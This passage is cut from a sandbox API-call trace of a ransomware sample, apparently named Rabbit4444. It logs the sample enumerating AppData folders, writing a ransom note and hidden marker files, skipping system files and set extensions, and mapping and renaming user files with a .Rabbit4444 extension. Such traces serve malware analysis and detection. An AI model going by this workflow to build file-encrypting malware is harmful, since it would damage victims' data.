lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.425] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.425] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.426] CloseHandle (hObject=0x2cc) returned 1 [0064.426] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData") returned 90 [0064.426] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.426] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8681db72, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x8681db72, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefb8aa36, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0064.426] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.426] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.426] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.426] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.426] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8681db72, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x8681db72, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefb8aa36, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.427] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.427] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.427] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.427] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.427] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.427] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefb8aa36, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefb8aa36, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb8aa36, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.427] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.427] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.427] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefb8aa36, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefb8aa36, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb8aa36, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.427] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0064.427] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.427] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.428] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.428] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.428] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.428] CloseHandle (hObject=0x2a0) returned 1 [0064.428] CloseHandle (hObject=0x2cc) returned 1 [0064.428] GetCurrentThreadId () returned 0xd98 [0064.428] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0064.428] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings" [0064.428] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123bd8 | out: hHeap=0xe0000) returned 1 [0064.428] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0064.428] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings" [0064.429] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\" [0064.429] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0064.429] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.432] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.436] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.436] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.437] CloseHandle (hObject=0x2cc) returned 1 [0064.437] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings") returned 85 [0064.437] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.437] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x71318bbc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xefbb0cfa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0064.437] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.437] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.437] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.437] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.437] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x71318bbc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xefbb0cfa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.437] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.438] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.438] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.438] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.438] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.438] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefbb0cfa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefbb0cfa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefbb0cfa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.438] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.438] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.438] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea0fb524, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xea0fb524, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xea0fb524, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0064.438] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.438] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.438] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0064.438] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0064.438] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0064.438] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0064.438] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0064.438] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0064.438] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0064.438] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0064.438] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0064.438] lstrcpyW (in: lpString1=0x130ebe4, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0064.438] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0064.439] lstrlenW (lpString="roaming.lock") returned 12 [0064.439] lstrlenW (lpString="Rabbit4444") returned 10 [0064.439] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0064.439] lstrlenW (lpString=".dll") returned 4 [0064.439] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0064.439] lstrlenW (lpString=".lnk") returned 4 [0064.439] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0064.439] lstrlenW (lpString=".ini") returned 4 [0064.439] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0064.439] lstrlenW (lpString=".sys") returned 4 [0064.439] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0064.439] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea062a65, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbad767dc, ftLastAccessTime.dwHighDateTime=0x1d32747, ftLastWriteTime.dwLowDateTime=0xbad767dc, ftLastWriteTime.dwHighDateTime=0x1d32747, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0064.439] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.439] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.439] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0064.439] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0064.439] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0064.439] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0064.439] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0064.439] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0064.439] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0064.440] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0064.440] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0064.440] lstrcpyW (in: lpString1=0x130ebe4, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0064.440] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0064.440] lstrlenW (lpString="settings.dat") returned 12 [0064.440] lstrlenW (lpString="Rabbit4444") returned 10 [0064.440] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0064.440] lstrlenW (lpString=".dll") returned 4 [0064.440] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0064.440] lstrlenW (lpString=".lnk") returned 4 [0064.440] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0064.440] lstrlenW (lpString=".ini") returned 4 [0064.440] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0064.440] lstrlenW (lpString=".sys") returned 4 [0064.440] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0064.440] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.440] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0064.440] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15575124278) returned 1 [0064.441] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0064.441] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0064.441] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0064.441] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0064.442] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0064.443] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e0b0 [0064.444] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0064.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e0b0 | out: hHeap=0xe0000) returned 1 [0064.444] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0064.444] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e0b0 [0064.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0064.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e0b0 | out: hHeap=0xe0000) returned 1 [0064.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0064.444] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15575474364) returned 1 [0064.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0064.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0064.444] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.444] CloseHandle (hObject=0x27c) returned 1 [0064.444] CloseHandle (hObject=0x2a0) returned 1 [0064.444] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 109 [0064.444] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0064.445] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7ba1734c, ftCreationTime.dwHighDateTime=0x1d32735, ftLastAccessTime.dwLowDateTime=0x7ba1734c, ftLastAccessTime.dwHighDateTime=0x1d32735, ftLastWriteTime.dwLowDateTime=0x7ba1734c, ftLastWriteTime.dwHighDateTime=0x1d32735, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0064.445] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.445] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.445] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0064.445] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0064.445] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0064.446] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0064.446] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0064.446] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0064.446] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0064.446] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0064.446] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0064.446] lstrcpyW (in: lpString1=0x130ebe4, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0064.446] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0064.446] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0064.447] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0064.447] lstrlenW (lpString="Rabbit4444") returned 10 [0064.447] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0064.447] lstrlenW (lpString=".dll") returned 4 [0064.447] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0064.447] lstrlenW (lpString=".lnk") returned 4 [0064.447] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0064.447] lstrlenW (lpString=".ini") returned 4 [0064.447] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0064.447] lstrlenW (lpString=".sys") returned 4 [0064.447] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0064.447] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.447] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0064.447] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15575797167) returned 1 [0064.447] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0064.447] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0064.447] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0064.447] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0064.448] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0064.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e0b0 [0064.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0064.450] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e0b0 | out: hHeap=0xe0000) returned 1 [0064.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0064.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e0b0 [0064.450] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0064.450] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e0b0 | out: hHeap=0xe0000) returned 1 [0064.450] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0064.450] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15576075537) returned 1 [0064.450] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0064.450] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0064.450] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.450] CloseHandle (hObject=0x27c) returned 1 [0064.450] CloseHandle (hObject=0x2a0) returned 1 [0064.450] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444") returned 114 [0064.450] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0064.451] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7ba1734c, ftCreationTime.dwHighDateTime=0x1d32735, ftLastAccessTime.dwLowDateTime=0x7ba1734c, ftLastAccessTime.dwHighDateTime=0x1d32735, ftLastWriteTime.dwLowDateTime=0x7ba1734c, 